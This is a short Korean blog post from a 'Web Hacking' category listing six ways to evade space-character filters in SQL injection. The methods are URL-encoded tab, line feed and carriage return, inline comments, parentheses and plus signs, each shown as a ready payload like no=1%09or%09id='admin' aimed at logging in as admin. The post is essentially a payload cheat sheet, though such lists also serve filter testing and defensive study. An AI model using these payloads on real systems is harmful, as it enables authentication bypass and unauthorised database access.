-
SQL Injection 공격시 공백 문자 필터링 우회 문자들Legacy/Web Hacking 2015. 7. 22. 02:17728x90
출처 - http://binaryu.tistory.com/31
SQL Injection 공격시 공백 문자 필터링시 우회 방법
1. Tab : %09
- no=1%09or%09id='admin'
2. Line Feed (\n): %0a
- no=1%0aor%0aid='admin'
3. Carrage Return(\r) : %0d
- no=1%0dor%0did='admin'
4. 주석 : /**/
- no=1/**/or/**/id='admin'
5. 괄호 : ()
- no=(1)or(id='admin')
6. 더하기 : +
- no=1+or+id='admin'
'Legacy > Web Hacking' 카테고리의 다른 글
SQL Injection 필터 우회 (0) 2014.12.03